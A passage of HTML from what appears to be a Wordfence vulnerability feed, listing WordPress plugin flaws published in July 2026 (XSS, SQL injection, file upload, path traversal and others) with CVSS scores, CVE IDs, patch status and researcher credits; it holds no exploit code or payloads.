				<strong>Jul 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/enquiry-quotation-for-woocommerce" target="_blank" rel="noopener">PiWeb Product Enquiry or product catalog for WooCommerce</a> <span class="wfvr-software-slug">[enquiry-quotation-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duna" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bd7e0df88698258ec0187a7b262a69d7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bd7e0df88698258ec0187a7b262a69d7"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duna" target="_blank" rel="noopener">duna</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/be1bc322-1d42-4e33-adff-dbe706bb9f58" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b3e00e40-cdbb-469f-89ec-6a28bf2014fd" target="_blank" rel="noopener">Product Feed Manager For WooCommerce – Sell on 200+ Online Marketplaces &lt;= 7.6.1 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59553" target="_blank" rel="noopener noreferrer">							CVE-2026-59553						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/best-woocommerce-feed" target="_blank" rel="noopener">Product Feed Manager For WooCommerce – Sell on 200+ Online Marketplaces</a> <span class="wfvr-software-slug">[best-woocommerce-feed]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hhhai" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d1f39a6f73f4287f8e67a2fe1f852ba7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d1f39a6f73f4287f8e67a2fe1f852ba7"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hhhai" target="_blank" rel="noopener">hhhai</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b3e00e40-cdbb-469f-89ec-6a28bf2014fd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bef0eeb8-ed6d-46a3-91c5-84bdd88922b4" target="_blank" rel="noopener">Really Simple CSV Importer &lt;= 1.3 &#8211; Authenticated (Admin+) Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65461" target="_blank" rel="noopener noreferrer">							CVE-2026-65461						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/really-simple-csv-importer" target="_blank" rel="noopener">Really Simple CSV Importer</a> <span class="wfvr-software-slug">[really-simple-csv-importer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bef0eeb8-ed6d-46a3-91c5-84bdd88922b4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a4b46cb3-766f-4524-be04-e10dea3e5bfa" target="_blank" rel="noopener">Smart Manager – Advanced WooCommerce Bulk Edit &amp; Inventory Management &lt;= 8.90.0 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-57704" target="_blank" rel="noopener noreferrer">							CVE-2026-57704						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smart-manager-for-wp-e-commerce" target="_blank" rel="noopener">Smart Manager – Advanced WooCommerce Bulk Edit &amp; Inventory Management</a> <span class="wfvr-software-slug">[smart-manager-for-wp-e-commerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/851f04ad769b87bcc7fe5afe8300abd1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="851f04ad769b87bcc7fe5afe8300abd1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener">Nguyen Ba Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a4b46cb3-766f-4524-be04-e10dea3e5bfa" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/366b5051-d042-4425-9aad-b77d93bcd485" target="_blank" rel="noopener">SUMO Reward Points for WooCommerce &lt;= 32.7.0 &#8211; Unauthenticated Stored Cross-Site Scripting via &#8216;reason&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-7534" target="_blank" rel="noopener noreferrer">							CVE-2026-7534						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rewardsystem" target="_blank" rel="noopener">SUMO Reward Points for WooCommerce</a> <span class="wfvr-software-slug">[rewardsystem]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-cong-quang" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/01e9ff51a749f2beebcde4e6d5b68519.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01e9ff51a749f2beebcde4e6d5b68519"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-cong-quang" target="_blank" rel="noopener">Nguyen Cong Quang</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/366b5051-d042-4425-9aad-b77d93bcd485" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0714273b-014e-4bed-b394-138f46a77eaa" target="_blank" rel="noopener">VikBooking Hotel Booking Engine &amp; PMS &lt;= 1.8.13 &#8211; Unauthenticated Stored Cross-Site Scripting via Custom Field &#8216;vbfX&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15401" target="_blank" rel="noopener noreferrer">							CVE-2026-15401						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/vikbooking" target="_blank" rel="noopener">VikBooking Hotel Booking Engine &amp; PMS</a> <span class="wfvr-software-slug">[vikbooking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0714273b-014e-4bed-b394-138f46a77eaa" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/966fdfc9-7c8d-4912-80d7-7371b6fce0f3" target="_blank" rel="noopener">Complianz – GDPR/CCPA Cookie Consent &lt;= 7.5.1 &#8211; Authenticated (Administrator+) PHP Object Injection</a></h4>
<div class="cvss-score-badge">6.6</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.6 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65497" target="_blank" rel="noopener noreferrer">							CVE-2026-65497						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/complianz-gdpr" target="_blank" rel="noopener">Complianz – GDPR/CCPA Cookie Consent</a> <span class="wfvr-software-slug">[complianz-gdpr]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/966fdfc9-7c8d-4912-80d7-7371b6fce0f3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2a965a23-5594-4925-8104-6f387a60ab49" target="_blank" rel="noopener">AI Copilot &lt;= 1.5.4 &#8211; Authenticated (Subscriber+) SQL Injection via &#8216;order[0][dir]&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13009" target="_blank" rel="noopener noreferrer">							CVE-2026-13009						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ai-copilot-content-generator" target="_blank" rel="noopener">AI Copilot – Content Generator</a> <span class="wfvr-software-slug">[ai-copilot-content-generator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2a965a23-5594-4925-8104-6f387a60ab49" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a9576cee-2375-437e-9dc8-713209a96a73" target="_blank" rel="noopener">Checkout Field Editor for WooCommerce (Pro) &lt;= 3.7.7 &#8211; Authenticated (Subscriber+) Path Traversal to Arbitrary File Read via &#8216;thwcfe_legacy_file&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14955" target="_blank" rel="noopener noreferrer">							CVE-2026-14955						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-checkout-field-editor-pro" target="_blank" rel="noopener">Checkout Field Editor for WooCommerce (Pro)</a> <span class="wfvr-software-slug">[woocommerce-checkout-field-editor-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xd4rk5id3" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2a1b4c1c638eb4f66b0677e71058a830.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2a1b4c1c638eb4f66b0677e71058a830"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xd4rk5id3" target="_blank" rel="noopener">0xd4rk5id3</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a9576cee-2375-437e-9dc8-713209a96a73" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3e5ad3a7-03c5-4085-b330-bc77e7e46cea" target="_blank" rel="noopener">Contact Form 7 – Dynamic Text Extension &lt;= 5.0.6 &#8211; Unauthenticated Arbitrary Shortcode Execution</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2025-13146" target="_blank" rel="noopener noreferrer">							CVE-2025-13146						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contact-form-7-dynamic-text-extension" target="_blank" rel="noopener">Contact Form 7 – Dynamic Text Extension</a> <span class="wfvr-software-slug">[contact-form-7-dynamic-text-extension]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/burak-kilinc-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3164f21bc10eced2a82b94d326c26614.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3164f21bc10eced2a82b94d326c26614"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/burak-kilinc-2" target="_blank" rel="noopener">NosleeP++</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3e5ad3a7-03c5-4085-b330-bc77e7e46cea" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/393bf415-f4fb-43c4-86b9-f066457e3526" target="_blank" rel="noopener">Create &lt;= 2.5.3 &#8211; Authenticated (Contributor+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-24552" target="_blank" rel="noopener noreferrer">							CVE-2026-24552						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mediavine-create" target="_blank" rel="noopener">Create</a> <span class="wfvr-software-slug">[mediavine-create]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/393bf415-f4fb-43c4-86b9-f066457e3526" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/458b58d1-81eb-4934-84ae-55ac66a71df7" target="_blank" rel="noopener">Dokan Pro &lt;= 5.0.2 &#8211; Authenticated (Subscriber+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65494" target="_blank" rel="noopener noreferrer">							CVE-2026-65494						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dokan-pro" target="_blank" rel="noopener">Dokan Pro</a> <span class="wfvr-software-slug">[dokan-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/expatch" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/791c547484c10e03a88616b631bb8a6a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="791c547484c10e03a88616b631bb8a6a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/expatch" target="_blank" rel="noopener">Expatch</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/458b58d1-81eb-4934-84ae-55ac66a71df7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/09925777-5a25-4c7a-bc05-970512992943" target="_blank" rel="noopener">eRoom – Webinar &amp; Meeting Plugin for Zoom, Google Meet, Microsoft Teams &lt;= 1.7.1 &#8211; Authenticated (Contributor+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-25405" target="_blank" rel="noopener noreferrer">							CVE-2026-25405						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/eroom-zoom-meetings-webinar" target="_blank" rel="noopener">eRoom – Webinar &amp; Meeting Plugin for Zoom, Google Meet, Microsoft Teams</a> <span class="wfvr-software-slug">[eroom-zoom-meetings-webinar]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phuc-truong-huu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/15c7bc3e71963fdd7c656346bcf8b159.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="15c7bc3e71963fdd7c656346bcf8b159"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phuc-truong-huu" target="_blank" rel="noopener">Trương Hữu Phúc (truonghuuphuc)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/09925777-5a25-4c7a-bc05-970512992943" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5d0b26b6-61e3-4fa2-9cde-6e49bb7e1d7f" target="_blank" rel="noopener">MapSVG – Vector maps, Image maps, Google Maps &lt;= 8.14.0 &#8211; Authenticated (Contributor+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65450" target="_blank" rel="noopener noreferrer">							CVE-2026-65450						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mapsvg-lite-interactive-vector-maps" target="_blank" rel="noopener">MapSVG – Vector maps, Image maps, Google Maps</a> <span class="wfvr-software-slug">[mapsvg-lite-interactive-vector-maps]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phuc-truong-huu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/15c7bc3e71963fdd7c656346bcf8b159.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="15c7bc3e71963fdd7c656346bcf8b159"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phuc-truong-huu" target="_blank" rel="noopener">Trương Hữu Phúc (truonghuuphuc)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5d0b26b6-61e3-4fa2-9cde-6e49bb7e1d7f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/82299c65-2d27-472f-85c8-9e8b3d8ff02b" target="_blank" rel="noopener">MapSVG &lt;= 8.14.0 &#8211; Authenticated (Contributor+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
